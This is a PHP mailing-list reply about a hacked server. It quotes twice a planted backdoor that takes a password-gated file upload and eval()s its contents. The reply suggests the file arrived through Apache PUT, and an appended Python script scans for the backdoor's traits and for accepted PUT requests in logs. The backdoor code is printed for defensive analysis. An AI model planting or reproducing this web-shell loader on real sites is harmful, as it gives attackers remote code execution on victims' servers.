Re: [PHP] Hack question



Al wrote:
I'm still fighting my hack problem on one of my servers. Can anyone help me figure out what's the purpose of this code? The hack places this file in numerous dirs on the site, I assume using a php script because the owner is "nobody".

I can sort of figure what it is doing; but, I can't figure out what the hacker is using it for.

Incidentally, I've changed all passwords and restricted ftp to two people. I see no sign that any code is written by the site owner, i.e., ftp. And, I've looked carefully for suspect php files.

<?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; echo "<pre>"; testdata('start'); if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){ eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); }; testdata('end'); echo "</pre>"; ?>

<?php error_reporting(1);
global $HTTP_SERVER_VARS;
function say($t)
{
    echo "$t\n";
} ;
function testdata($t)
{
    say(md5("testdata_$t"));
} ;
echo "<pre>";
testdata('start');
if (md5($_POST["p"]) == "aace99428c50dbe965acc93f3f275cd3")
{
    if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"), $HTTP_POST_FILES["f"]["size"]))
    {
        eval($code);
    } else
    {
        testdata('f');
    } ;
} else
{
    testdata('pass');
} ;
testdata('end');
echo "</pre>";
?>


Don't always assume it is PHP. Is Apache running as nobody? If so, it could be Apache using the PUT method to place the file in a writable directory.

--
Jim Lucas

"Some men are born to greatness, some achieve greatness,
and some have greatness thrust upon them."

Twelfth Night, Act II, Scene V
by William Shakespeare
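
Added example, not part of the original thread: a triage script for the two leads above. It finds PHP files owned by the web server account that show the quoted file's traits, and lists PUT requests the server accepted. The function names, the `web_uid` parameter (the numeric uid of the account, e.g. `nobody`), the Apache common/combined log format and the sample log lines are assumptions made for this example.

```python
import os, re

# Traits of the file quoted above. Each is weak alone; two or more is a strong hit.
INDICATORS = {
    "eval_of_variable": re.compile(r"\beval\s*\(\s*\$\w+"),
    "reads_uploaded_file": re.compile(
        r"\$(?:HTTP_POST_FILES|_FILES)\s*\[[^\]]+\]\s*\[\s*[\"']tmp_name[\"']"),
    "hardcoded_md5_gate": re.compile(
        r"md5\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b[^)]*\)\s*={2,3}\s*[\"'][0-9a-f]{32}[\"']",
        re.I),
}
# Assumed Apache common/combined log format: client, method, path, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')
# Constructed sample log lines (documentation addresses, hypothetical paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "PUT /images/x.php HTTP/1.1" 201 0',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "PUT /images/y.php HTTP/1.1" 405 312',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php HTTP/1.1" 200 5120',
]

def indicators(php_source):
    """Sorted names of the traits found in one PHP source string."""
    return sorted(n for n, rx in INDICATORS.items() if rx.search(php_source))

def scan_tree(root, web_uid, min_hits=2):
    """List (path, hits) for PHP files owned by web_uid showing >= min_hits traits."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if not name.lower().endswith((".php", ".phtml", ".inc")):
                continue
            try:
                if os.lstat(path).st_uid != web_uid:
                    continue  # not written by the web server account
                with open(path, errors="replace") as fh:
                    hits = indicators(fh.read())
            except OSError:
                continue  # unreadable or vanished file: skip, keep scanning
            if len(hits) >= min_hits:
                found.append((path, hits))
    return found

def accepted_puts(log_lines):
    """(client, path, status) for PUT requests the server answered with 2xx."""
    rows = (LOG_RE.match(line) for line in log_lines)
    return [(m[1], m[3], int(m[4])) for m in rows
            if m and m[2].upper() == "PUT" and m[4].startswith("2")]
```

An empty result from `accepted_puts` over the full access log argues against the PUT theory; files reported by `scan_tree` give the paths to search the same log for as POST targets.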
